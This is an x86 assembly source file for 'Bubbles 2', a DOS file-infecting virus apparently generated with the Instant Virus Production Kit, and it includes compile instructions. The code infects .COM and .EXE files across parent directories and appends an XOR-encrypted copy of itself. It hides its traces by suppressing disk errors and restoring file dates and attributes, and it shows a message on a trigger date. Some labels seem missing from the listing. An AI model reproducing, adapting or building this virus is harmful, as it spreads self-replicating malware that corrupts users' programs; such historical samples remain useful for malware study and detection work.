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synced 2025-02-01 06:47:28 +00:00
428 lines
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428 lines
17 KiB
; Bubbles 2 written by Admiral Bailey
Code Segment Public 'Code'
Assume CS:Code
Org 100h ; All .COM files start here
ID = 'AB' ; Id for infected files
MaxFiles = 3 ; Max number of file to infect
db 0e9h,2,0 ; Jump to the next command
dw id ; So this file doesnt get infected
call realcode ; Push current location on stack
pop bp ; Get location off stack
sub bp,offset realcode ; Adjust it for our pointer
call encrypt_decrypt ; Decrypt the virus first
Encrypt_Start equ $ ; From here is encrypted
cmp sp,id ; Is this file a COM or EXE?
je restoreEXE ; Its an EXE so restore it
lea si,[bp+offset oldjump] ; Location of old jump in si
mov di,100h ; Restore new jump to 100h
push di ; Save so we could just return when done
movsb ; Move a byte
movsw ; Move a word
movsw ; Move another word
jmp exitrestore
push ds ; Save ExE ds
push es ; Save ExE es
push cs
pop ds ; DS now equals CS
push cs
pop es ; ES now equals CS
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw ; Move a word
movsw ; Move a word
movsw ; Move a word
movsw ; Move a word
lea dx,[bp+offset dta] ; Where to put New DTA
call set_DTA ; Move it
mov [bp+counter],byte ptr 0 ; Clear counter
mov ax,3524h ; Get int 24 handler
int 21h ; It gets put in ES:BX
mov word ptr [bp+oldint24],bx ; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; Loc of new one in DS:DX
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
mov ah,47h ; Get the current directory
mov dl,0h ; On current drive
lea si,[bp+offset currentdir] ; Where to keep it
int 21h
lea dx,[bp+offset exefilespec] ; Files to look for
call findfirst
lea dx,[bp+offset comfilespec] ; Files to look for
call findfirst
lea dx,[bp+offset directory] ; Where to change too '..'
mov ah,3bh ; Change directory
int 21h
jnc dirloop ; If no problems the look for files
call activate ; Call the activation routine
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; To original
int 21h
push cs
pop ds ; Do this because the DS gets changed
lea dx,[bp+offset currentdir] ; Location Of original dir
mov ah,3bh ; Change to there
int 21h
mov dx,80h ; Location of original DTA
call set_dta ; Put it back there
cmp sp,id-4 ; Is this file an EXE or COM?
jz returnEXE ; Its an EXE!
retn ; Return to 100h (original jump)
pop es ; Get original ES
pop ds ; Get original DS
mov ax,es
add ax,10h
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear int's because of stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
db 0eah ; Jump ssss:oooo
jmpsave dd ? ; Jump location
stacksave dd ? ; Original cs:ip
jmpsave2 dd 0fff00000h
stacksave2 dd ?
cmp [bp+counter],maxfiles ; Have we infected Too many
ja quit ; Yup
mov ah,4eh ; Find first file
mov cx,7 ; Find all attributes
int 21h ; Find first/next file int
jc quit ; If none found then change dir
call infection ; Infect that file
mov ah,4fh ; Find next file
jmp findnext ; Jump to the loop
mov ax,3d00h ; Open file for read only
call open
mov ah,3fh ; Read from file
mov cx,1ah ; Number of bytes
lea dx,[bp+offset buffer] ; Location to store them
int 21h
mov ah,3eh ; Close file
int 21h
mov ax,word ptr [bp+DTA+1Ah] ; Get filesize from DTA
cmp ax,64000 ; Is the file too large?
ja quitinfect ; file to large so getanother
cmp ax,600 ; Is the file too small?
jb quitinfect ; file to small so getanother
cmp word ptr [bp+buffer],'ZM' ; Is file found an EXE?
jz checkEXE ; Yup so check it
mov ax,word ptr [bp+DTA+35] ; Get end of file name in ax
cmp ax,'DN' ; Does it end in 'ND'?
jz quitinfect ; Yup so get another file
mov bx,word ptr [bp+offset dta+1ah] ; Get file size
cmp word ptr cs:[bp+buffer+3],id ; Check for ID
je quitinfect
jmp infectcom
cmp word ptr [bp+buffer+10h],id ; Check EXE for infection
jz quitinfect ; Already infected so close up
jmp infectexe
sub bx,3 ; Adjust for new jump
lea si,[bp+buffer] ; Move the old jump first
lea di,[bp+oldjump]
mov [bp+buffer],byte ptr 0e9h ; Setup new jump
mov word ptr [bp+buffer+1],bx ; Save new jump
mov word ptr [bp+buffer+3],id ; Put in ID
mov cx,5 ; Number of bytes to write
jmp finishinfection
les ax,dword ptr [bp+buffer+14h] ; Load es with seg address
mov word ptr [bp+jmpsave2],ax ; save old cs:ip
mov word ptr [bp+jmpsave2+2],es
les ax,dword ptr [bp+buffer+0eh] ; save old ss:sp
mov word ptr [bp+stacksave2],es ; save old cs:ip
mov word ptr [bp+stacksave2+2],ax
mov ax, word ptr [bp+buffer+8] ; get header size
mov cl,4
shl ax,cl
xchg ax,bx
les ax,[bp+offset DTA+26] ; get files size from dta
mov dx,es ; its now in dx:ax
push ax ; save these
push dx
sub ax,bx ; subtract header size from fsize
sbb dx,0 ; subtract the carry too
mov cx,10h ; convert to segment:offset form
div cx
mov word ptr [bp+buffer+14h],dx ; put in new header
mov word ptr [bp+buffer+16h],ax ; cs:ip
mov word ptr [bp+buffer+0eh],ax ; ss:sp
mov word ptr [bp+buffer+10h],id ; put id in for later
pop dx ; get the file length back
pop ax
add ax,eof-virus ; add virus size
adc dx,0 ; add with carry
mov cl,9 ; calculates new file size
push ax
shr ax,cl
ror dx,cl
adc dx,ax
pop ax
and ah,1
mov word ptr [bp+buffer+4],dx ; save new file size in header
mov word ptr [bp+buffer+2],ax
push cs ; es = cs
pop es
mov cx,1ah ; Size of EXE header
push cx ; save # of bytes to write
xor cx,cx ; Set attriutes to none
call attributes
mov al,2 ; open file read/write
call open
mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Location of bytes
pop cx ; Get number of bytes to write
int 21h
jc closefile
mov al,02 ; Move Fpointer to eof
Call move_fp
mov ah,2ch ; Get time for encryption value
int 21h
cmp dh,0 ; If its seconds are zero get another
je get_time
mov [bp+enc_value],dh ; Use seconds value for encryption
call encrypt_infect ; Encrypt and infect the file
inc [bp+counter] ; Increment the counter
mov ax,5701h ; Set files date/time back
mov cx,word ptr [bp+dta+16h] ; Get old time from dta
mov dx,word ptr [bp+dta+18h] ; Get old date
int 21h
mov ah,3eh ; Close file
int 21h
xor cx,cx
mov cl,byte ptr [bp+dta+15h] ; Get old Attributes
call attributes
mov ah,2ah ; Get current date
int 21h
cmp cx,1993 ; Check current Year
jb dont_activate
cmp dl,13 ; Check current Day
jne dont_activate
mov ah,2ch ; Get current time
int 21h
cmp ch,13 ; Check current hour
jne dont_activate
mov ah,9 ; Display string
lea dx,[bp+messege] ; The string to display
int 21h
mov cx,2
include .\routines\phasor.rtn ; Include file
mov ah,42h ; Move file pointer
xor cx,cx ; Al has location
xor dx,dx ; Clear these
int 21h
mov ah,1ah ; Move the DTA location
int 21h ; DX has location
mov ah,3dh ; open file
lea dx,[bp+DTA+30] ; Filename in DTA
int 21h
xchg ax,bx ; put file handle in bx
mov ax,4301h ; Set attributes to cx
lea dx,[bp+DTA+30] ; filename in DTA
int 21h
int24: ; New Int 24h
mov al,3 ; Fail call
iret ; Return from int 24 call
Virusname db 'Bubbles 2' ; Name Of The Virus
Author db 'Admiral Bailey' ; Author Of This Virus
db 'Bubbles 2 : Its back and better then ever.',10,13
db ' ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^',10,13
db 'Is it me or does that Make no sense at all?',10,13
Made_with db '[IVP2]',10,13,'$' ; Please do not remove this
comfilespec db '*.com',0 ; Holds type of file to look for
exefilespec db '*.exe',0 ; Holds type of file to look for
directory db '..',0 ; Directory to change to
oldjump db 0cdh,020h,0,0,0 ; Old jump. Is int 20h for file quit
lea si,[bp+offset move_begin] ; Location of where to move from
lea di,[bp+offset workarea] ; Where to move it too
mov cx,move_end-move_begin ; Number of bytes to move
movsb ; Moves this routine into heap
loop move_loop
lea dx,[bp+offset workarea]
call dx ; Jump to that routine just moved
Move_Begin equ $ ; Marks beginning of move
push bx ; Save the file handle
lea dx,[bp+offset encrypt_end]
call dx ; Call the encrypt_decrypt procedure
pop bx ; Get handle back in bx and return
mov ah,40h ; Write to file
mov cx,eof-virus ; Number of bytes
lea dx,[bp+offset virus] ; Where to write from
int 21h
push bx ; Save the file handle
lea dx,[bp+offset encrypt_end]
call dx ; Decrypt the file and return
pop bx ; Get handle back in bx and return
move_end equ $ ; Marks the end of move
Encrypt_End equ $ ; Marks the end of encryption
mov cx,encrypt_end-encrypt_start ; bytes to encrypt
lea si,cs:[bp+encrypt_start] ; start of encryption
mov di,si
xor ah,cs:[bp+enc_value]
loop encloop
Enc_Value db 00h ; Hold the encryption value 00 for nul effect
EOF equ $ ; Marks the end of file
Counter db 0 ; Infected File Counter
Workarea db move_end-move_begin dup (?) ; Holds the encrypt_infect routine
currentdir db 64 dup (?) ; Holds the current dir
DTA db 42 dup (?) ; Location of new DTA
Buffer db 1ah dup (?) ; Holds exe header
OldInt24 dd ? ; Storage for old int 24h handler
Filler db 3000 dup (0)
eov equ $ ; Used For Calculations
code ends
end start
; Instant Virus Production Kit By Admiral Bailey - Youngsters Against McAfee
; To compile this use TASM /M FILENAME.ASM
; Then type tlink /t FILENAME.OBJ